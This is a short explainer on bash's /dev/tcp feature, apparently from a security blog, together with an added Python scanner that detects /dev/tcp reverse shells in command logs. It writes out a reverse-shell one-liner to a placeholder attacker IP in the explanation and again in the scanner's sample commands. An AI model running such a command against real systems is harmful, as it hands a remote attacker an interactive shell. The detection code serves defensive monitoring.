Netcat with no netcat: /dev/tcp.
This is a feature of bash (on most systems) that lets a shell command talk to the machine's TCP stack directly. Writing data to /dev/tcp/ipAddress/port makes bash open a TCP connection to that IP address and port and send the data over it. Note that /dev/tcp is not a real device file: bash itself interprets the path when it appears in a redirection (the binary must have been built with network redirections enabled), so nothing exists at that path on disk and the trick does not work in sh or dash. You can leverage this to send a command shell across the network to a listener by invoking the following command:
/bin/bash -i > /dev/tcp/[attackerIP]/[port] 0<&1 2>&1
Here’s the breakdown:
Bash is started in interactive (-i) mode with its standard output redirected to /dev/tcp, which tells bash to open a TCP connection to the given IP on the given port. Once that redirection is in place, file descriptor 1 (stdout) is the socket; 0<&1 then makes standard input a duplicate of that descriptor, and 2>&1 does the same for standard error, so everything the shell reads and writes travels over the single network connection.
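Because the whole technique lives in the command line, the same text a defender collects from shell history, auditd execve records or an EDR process log is enough to spot it. The following is an added example, not code from the original post: a small Python scanner that flags /dev/tcp and /dev/udp redirections in recorded command lines, raising severity when the interactive-shell flag and the stdin/stderr duplication described above are also present, while scoring a plain port probe as low. The sample command lines and the 192.0.2.x / 198.51.100.x addresses are constructed for the demonstration.

```python
import re
from typing import Dict, List, Optional

# bash network redirections look like /dev/tcp/<host>/<port> or /dev/udp/<host>/<port>
DEV_NET_RE = re.compile(r"/dev/(tcp|udp)/([A-Za-z0-9.\-]+)/(\d{1,5})")

# Extra signals that turn a port check into a reverse shell:
# an interactive shell ("bash -i") and descriptor duplication ("0<&1", "2>&1").
INTERACTIVE_SHELL_RE = re.compile(r"\b(?:/bin/)?(?:ba)?sh\s+-i\b")
FD_DUP_RE = re.compile(r"\d?[<>]&\d")

# Constructed sample command lines, as they might appear in an execve log.
SAMPLE_COMMANDS: List[str] = [
    "ls -la /var/log",
    "/bin/bash -i > /dev/tcp/192.0.2.10/4444 0<&1 2>&1",   # reverse shell
    "exec 3<>/dev/tcp/localhost/80",                        # local health check
    "bash -c 'cat < /dev/tcp/198.51.100.7/9001' 2>&1",      # pulls data from a remote port
]


def scan_command(cmd: str) -> Optional[Dict[str, object]]:
    """Return a finding for one command line, or None if /dev/tcp|udp is absent."""
    m = DEV_NET_RE.search(cmd)
    if not m:
        return None
    proto, host, port = m.group(1), m.group(2), int(m.group(3))
    score = 1
    reasons = [f"/dev/{proto} redirection to {host}:{port}"]
    if INTERACTIVE_SHELL_RE.search(cmd):
        score += 1
        reasons.append("interactive shell (-i)")
    if FD_DUP_RE.search(cmd):
        score += 1
        reasons.append("file descriptor duplicated onto the socket")
    severity = {1: "low", 2: "medium"}.get(score, "high")
    return {"proto": proto, "host": host, "port": port,
            "severity": severity, "reasons": reasons, "command": cmd}


def scan_commands(commands: List[str]) -> List[Dict[str, object]]:
    """Scan a batch of command lines and return only the lines that hit."""
    findings = []
    for cmd in commands:
        finding = scan_command(cmd)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_commands(SAMPLE_COMMANDS):
        print(f"[{f['severity']:>6}] {f['command']}")
        for r in f["reasons"]:
            print(f"         - {r}")
```

The scoring is deliberately conservative: a bare /dev/tcp write is a common way to test whether a port is open, so it only becomes a high-severity finding when the command also starts an interactive shell and wires its descriptors to the socket. Tune the host pattern if your logs contain bracketed IPv6 literals.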